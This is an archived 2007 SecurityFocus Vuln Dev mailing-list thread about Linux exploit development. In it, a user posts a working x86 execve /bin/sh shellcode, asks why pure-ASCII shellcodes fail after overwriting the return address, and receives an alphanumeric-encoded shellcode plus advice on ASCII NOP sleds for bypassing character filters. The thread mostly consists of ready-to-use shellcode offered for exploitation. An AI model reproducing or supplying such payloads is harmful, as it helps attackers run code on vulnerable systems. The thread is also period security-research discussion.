Vuln Dev
Re: Re: Linux restricted ASCII Shellcode Apr 22 2007 10:42AM
nonexistant nospam org (2 replies)
Re: Linux restricted ASCII Shellcode Apr 23 2007 07:58AM
shadown (shadown gmail com) (1 replies)
Hi,

Here you have you shellcode in ascii format.

'hAAAAX5AAAAHPPPPPPPPah4A00X5ZnCXPh0A00X50nRYPTYIII19hAA00X5Vb00PTY19hA0
A0X5fpsOPTY19II19I19h0AA0X5OpeFPTY19II19I19h004AX5Bf8sPTY19I19II19h4040X
58Bz8PTYII19h4520X58z9FPTY19I19I19I19h0000X5v7FvPTYI19I19h0AE0X58pzGPTY1
9II19hE000X5ZnFFPTYI19I19h555AX5ZZZUPTY19T'

If the code you are trying to exploit does NOT allow nonASCII nops (that
actually is the only thing that makes sence) instead of '\x90' you will
have to use some ascii opcode/bytecode string that can be used as NOP
sled (for example 'A' -> inc ecx).

Cheers,
Sergio

nonexistant (at) nospam (dot) org [email concealed] wrote:
> Yes I'm having a seg-fault, but I can't catch you...
>
> AFAIK when EIP is pointing somewhere in the NOP sled, no matter how the shellcode is aligned... Alignment has nothing to do here...?¿? I'm wrong?
>
> More over, I've tryed more than 5 different ASCII shellcodes all with the same result... Always segfaulting. It looks as if shellcodes where not working for any common reason...
>
> So, summarizing:
>
> 1.- I can perfectly overwrite RET thus having EIP pointing almost 100% of the time to the NOP's of my shellcode (in an environment variable)
>
> 2.- My -non-ascii- shellcode works perfectly
>
> 3.- Whn I try with ANY pure ascii shellcode, it fails 100% of the time.
>
>
> What is happening?
>
>
> I've tryed with pure ASCII shellcodes ripped from http://shellcode.org/Shellcode/linux/ascii/ among others...
>
>
> Metasploit framework failed to convert the original shellcode -the one that works- to pure ascii with the selected charset (A-Z,a-z,0-9).
>
>
> That's the original shellcode:
>
>
> \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3
\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff
\xff\xff/bin/sh
>
>
> Is anyone able to convert this to pure ASCII or giving me a working pure ASCII shellcode or helping me understand why all the pure ascii shellcodes are failing in my exploit?
>
>
> Thank you,
>

--
Sergio Alvarez
Security, Research & Development
IT Security Consultant
email: shadown (at) gmail (dot) com [email concealed]

This message is confidential. It may also contain information that is
privileged or otherwise legally exempt from disclosure. If you have
received it by mistake please let us know by e-mail immediately and
delete it from your system; should also not copy the message nor
disclose its contents to anyone. Many thanks.

[ reply ]
Re: Linux restricted ASCII Shellcode Apr 23 2007 08:51AM
shadown (shadown gmail com)
Re: Re: Linux restricted ASCII Shellcode Apr 23 2007 03:56AM
Deian Stefan (deianstefan gmail com)


 

Privacy Statement
Copyright 2010, SecurityFocus